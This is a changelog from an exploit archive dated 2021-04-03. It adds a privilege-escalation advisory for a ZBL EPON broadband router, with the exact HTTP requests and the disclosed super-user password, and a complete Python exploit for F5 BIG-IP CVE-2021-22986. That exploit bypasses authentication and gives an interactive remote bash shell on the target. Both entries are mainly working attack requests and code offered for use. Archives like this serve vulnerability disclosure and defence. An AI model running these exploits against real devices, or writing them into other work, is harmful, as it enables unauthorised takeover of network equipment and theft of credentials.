DB: 2021-04-03

2 changes to exploits/shellcodes

ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation
F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)

exploits/hardware/webapps/49737.txt

@@ -0,0 +1,82 @@
+# Exploit Title: ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation
+# Date: 31.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.zblchina.com http://www.wd-thailand.com
+
+Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND))
+Product web page: http://www.zblchina.com | http://www.wd-thailand.com
+Affected version: Firmwre: V100R001
+                  Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE
+                  EONU Hardware Version	V3.0
+                  Software: V2.46.02P6T5S
+                  Main Chip: RTL9607
+                  Master Controller, Copyright (c) R&D
+
+Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband
+router.
+
+Desc: The application suffers from a privilege escalation
+vulnerability. The limited administrative user (admin:admin)
+can elevate his/her privileges by sending a HTTP GET request
+to the configuration backup endpoint or the password page
+and disclose the http super user password. Once authenticated
+as super, an attacker will be granted access to additional and
+privileged functionalities.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5467
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php
+
+
+31.01.2021
+
+--
+
+
+Get config file and disclose super pwd:
+---------------------------------------
+
+POST /HG104B-ZG-E.config HTTP/1.1
+Host: 192.168.1.1
+Connection: keep-alive
+Content-Length: 42
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: https://192.168.1.1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://192.168.1.1/system_configure.asp
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
+
+CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files=
+
+
+...
+  #web_1
+    user_web_name=super
+    user_web_password=www168nettv
+...
+
+
+Disclose super pwd from system pwd page:
+----------------------------------------
+
+GET /system_password.asp
+Host: 192.168.1.1
+
+...
+var webVars = new Array( 'HG104B-ZG-E', '1', '0','2;1;2');
+var sysadmin = new Array('600','1;super;www168nettv','1;admin;admin');
+...

exploits/hardware/webapps/49738.py

@@ -0,0 +1,92 @@
+# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)
+# Exploit Author: Al1ex
+# Vendor Homepage: https://www.f5.com/products/big-ip-services
+# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2
+# CVE : CVE-2021-22986
+
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+import sys
+
+
+def title():
+    print('''
+      ______ ____    ____  _______       ___     ___    ___    __        ___    ___     ___     ___      __   
+     /      |\   \  /   / |   ____|     |__ \   / _ \  |__ \  /_ |      |__ \  |__ \   / _ \   / _ \    / /   
+    |  ,----' \   \/   /  |  |__    ______ ) | | | | |    ) |  | |  ______ ) |    ) | | (_) | | (_) |  / /_   
+    |  |       \      /   |   __|  |______/ /  | | | |   / /   | | |______/ /    / /   \__, |  > _ <  | '_ \  
+    |  `----.   \    /    |  |____       / /_  | |_| |  / /_   | |       / /_   / /_     / /  | (_) | | (_) | 
+     \______|    \__/     |_______|     |____|  \___/  |____|  |_|      |____| |____|   /_/    \___/   \___/                                                                                                                                                                             
+    
+                                Author:Al1ex@Heptagram
+                                Github:https://github.com/Al1ex
+    ''')   
+
+def exploit(url):
+	target_url = url + '/mgmt/shared/authn/login'
+	data = {
+		"bigipAuthCookie":"",
+		"username":"admin",
+		"loginReference":{"link":"/shared/gossip"},
+		"userReference":{"link":"https://localhost/mgmt/shared/authz/users/admin"}
+	}
+	headers = {
+		"User-Agent": "hello-world",
+		"Content-Type":"application/x-www-form-urlencoded"
+	}
+	response = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15)
+	if "/mgmt/shared/authz/tokens/" not in response.text:
+		print('(-) Get token fail !!!')
+		print('(*) Tested Method 2:') 
+		header_2 = {
+		    'User-Agent': 'hello-world',
+		    'Content-Type': 'application/json',
+		    'X-F5-Auth-Token': '',
+		    'Authorization': 'Basic YWRtaW46QVNhc1M='
+		}
+		data_2 = {
+			"command": "run", 
+			"utilCmdArgs": "-c whoami"
+		}
+		check_url = url + '/mgmt/tm/util/bash'
+		try:
+			response2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20)
+			if response2.status_code == 200 and 'commandResult' in response2.text:
+				while True:
+					cmd = input("(:CMD)> ")
+					data_3 = {"command": "run", "utilCmdArgs": "-c '%s'"%(cmd)}
+					r = requests.post(url=check_url, json=data_3, headers=header_2, verify=False)
+					if r.status_code == 200 and 'commandResult' in r.text:
+						print(r.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))
+			else:
+				print('(-) Not vuln...')
+				exit(0)
+		except Exception:
+			print('ERROR Connect')
+	print('(+) Extract token: %s'%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0]))
+	while True:
+		cmd = input("(:CMD)> ")
+		headers = {
+			"Content-Type": "application/json",
+			"X-F5-Auth-Token": "%s"%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0])
+		}
+		data_json = {
+			"command": "run", 
+			"utilCmdArgs": "-c \'%s\'"%(cmd)
+		}
+		exp_url= url + '/mgmt/tm/util/bash'
+		exp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15)
+		if exp_req.status_code == 200 and 'commandResult' in exp_req.text:
+			print(exp_req.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))
+		else:
+			print('(-) Not vuln...')
+			exit(0)
+
+if __name__ == '__main__':
+    title()
+    if(len(sys.argv) < 2):
+    	print('[+] USAGE: python3 %s https://<target_url>\n'%(sys.argv[0]))
+    	exit(0)
+    else:
+    	exploit(sys.argv[1])

files_exploits.csv

@@ -43914,3 +43914,5 @@ id,file,description,date,author,type,platform,port
 49734,exploits/windows/webapps/49734.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)",2021-04-01,"Fellipe Oliveira",webapps,windows,
 49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,
 49735,exploits/linux/webapps/49735.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)",2021-04-01,"Fellipe Oliveira",webapps,linux,
+49737,exploits/hardware/webapps/49737.txt,"ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation",2021-04-02,LiquidWorm,webapps,hardware,
+49738,exploits/hardware/webapps/49738.py,"F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)",2021-04-02,Al1ex,webapps,hardware,